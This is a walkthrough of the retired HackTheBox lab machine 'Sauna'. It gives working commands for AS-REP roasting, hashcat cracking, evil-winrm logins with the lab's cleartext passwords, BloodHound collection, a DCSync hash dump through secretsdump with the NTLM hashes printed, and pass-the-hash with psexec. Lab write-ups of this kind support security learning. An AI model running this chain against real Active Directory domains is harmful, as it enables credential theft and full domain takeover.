HackTheBox.eu - Retired - Sauna

HackTheBox.eu - Retired - Sauna

Recon

As always I start with a simple up/down scan on all TCP ports to see what is open.

Nmap -T4 -p- -oX ./nmapb.xml sauna.htb

Then I convert it to HTML to make it pretty

xsltproc ./nmapb.xml -o ./nmapb.html

That is a lot of open ports. Let's rescan with the -A switch on just the open ports to try and finger OS/Services

# nmap -A -T4 -p 53,80,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49669,49670,49671,49682,55242 -oX ./nmapf.xml sauna.htb

Then we will convert that output to HTML also

OK

So it looks like a windows box, that has IIS on port 80 and it's a domain joined computer. With RPC,Winrm and SMB

SMB allows anonymous access but nothing's there

RPC allows me to connect with no password…. But access is denied for my quick testing 

Enum4linux gave me some info

We will have to try these again when we find some credentials

I get this error when trying to add a comment on the "single Page" which looks like a blog with commenting enabled

I did see on the same page what looks like an admin name

Here is the output from nikto

I also saw this in page

Ticket…. Roast????

I think this might be a clue put here by the creator to let us know we should be kerberoasting.

    

Exploit

We need to find some creds.

There is one attack We can do called ASREPRoast

This uses AD to get user password hashes for any account that doesn't require kerberos pre-authentication. In other word we don't have to know the password to get the hash, we just need a username and if they are configured to not use pre-authentication AD will happily pass the hash to us.

https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat

Where can we get usernames though?

I just looked at the website for any names listed on the website.

I found 

Fergus Smith

Shaun Coins

Hugo Bear

Bowie Taylor

Sophie driver

steven Kerb    ←--- Kerb huh? I see what you did there :)

JennyJoy

Now, how do we know the naming convention used in their AD…..

Well we don't, so I found this tool that given a list of names will generate possible AD naming conventions based off the list.

https://github.com/jseidl/usernamer

You simply supply it the list of name and dump it out to text file

I save my list of usernames in a file named names.txt

python ./usernamer.py -f /root/Desktop/HTB/sauna/names.txt  >> /root/Desktop/HTB/sauna/usernamer.txt

Here is some of the output file it produced

Now we can try AS-REP roasting.

We will user impacket's GetNPUsers.py to run this list to see if we get any hashes back

python ./GetNPUsers.py  egotisticalbank/ -users /root/Desktop/HTB/sauna/usernamer.txt -format hashcat -outputfile /root/Desktop/HTB/sauna/hash -dc-ip 10.10.10.175

This output can look a little misleading because it only shows the failures. We need to look at our output file to see if we got any hashes.

Woohooo we got a hash for Fsmith -- I assume that is fergus smith we found on the website earlier!

Let's send that over to john to see if we can get the password

# hashcat -m 18200 -a 0 /root/Desktop/HTB/sauna/hash /usr/share/wordlists/rockyou.txt --force

Cool,cool,cool,cool,cool,cool,cool

Got a password back

Thestrokes23

So recap.

We know have a user account

Egotisticalbank\fsmith

Thestrokes23

A quick little enum4linux scan gets us some more info on the domain.

# enum4linux -u egotisticalbank\\fsmith -p Thestrokes23 -U 10.10.10.175 -a

Looks like this could be an interesting service account

Svc-loanmgr

Now when we got to smbclient we can actually see some of the shares

No access to C$ or admin$, nothing in netlogon

Sysvol had some things

\EGOTISTICAL-BANK.LOCAL\Policies\{2619FB25-7519-4AEA-9C1E-348725EF2858}\machine\Microsoft\windows nt\secedit\> GptTmpl.inf

Same file name under

 \EGOTISTICAL-BANK.LOCAL\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\machine\Microsoft\windows NT\secedit\> 

Had a bit more info

Looks to me like a password policy set in Group Policy

Same file under

\EGOTISTICAL-BANK.LOCAL\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\machine\Microsoft\windows NT\secedit\> 

Looks like group memberships set in Group Policy

Let's see if we can connect up to the winrm we saw in our nmap scan 

I"m going to use evil-winrm to connect

https://github.com/Hackplayers/evil-winrm

Just going to test the connection and not setup any folders

# evil-winrm -i 10.10.10.175 -u egotisticalbank\\fsmith -p Thestrokes23 

Let's get that user hash

*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt

1b5*******************************

Local admin group shows no local users other than Administrator

Frank doesn't have rights to the wwwroot folder

What groups are in AD?

Let's let bloodhound do the leg work for us

./Sharphound.ps1

First we need to load up sharphound.ps1 in evil-winrm which I copied to my script directory (/opt/impacket/examples/)

After the script loads we can see Invoke-Bloodhound in our menu

*Evil-WinRM* PS C:\temp> Invoke-BloodHound -Domain egotisticalbank -LDAPUser fsmith -LDAPPass Thestrokes23 -CollectionMethod All -DomainController sauna

Now we download it to our kali box

Then just drag and drop it into bloodhoud

I then mark Fsmith as owned since we have his creds

Poked around in here for a bit couldn't really find a path from fsmith to get anywhere

So I loaded up winpeas.bat in the C:\temp folder and found this

 DefaultUserName    REG_SZ    EGOTISTICALBANK\svc_loanmanager

    DefaultPassword    REG_SZ    Moneymakestheworldgoround!

So we have another user

User: egotisticalbank\Svc_loanmanager

Pass: Moneymakestheworldgoround!

You might notice that the svc account name is different in the regkey than what we found while enumerating the box.

We saw svc_loanmgr not svc_loanmanager.

Let's see if the creds work for winrRM.

# evil-winrm -i 10.10.10.175 -u egotisticalbank\\svc_loanmgr -p Moneymakestheworldgoround! -e /Payloads/

Yup so we now have two sets of working credentials

What did bloodhound say about svc_loanmgr?

Well, svc_loanmgr has get changes permissions for the domain, which basically means they have rights to perform a directory sync on AD….

Which means they can get a copy of all AD info… like password hashes

Mwahaha!!!!

Let's use impackets secretsdumpy.py to get those hashes

# secretsdump.py -just-dc-ntlm egotisticalbank/svc_loanmgr@sauna.htb

Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::

EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::

EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::

EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::

SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:2dbc1c3839ca89e56f5331320cb10d25:::

Now let's try to pass the hash to get into sauna.htb as adminstrator

python psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff administrator@sauna.htb cmd.exe

Woot

Let's get that root hash

I tried running the administrator hash against rockyou.txt using hashcat, but it wasn't in the list apparently

So any way fun box!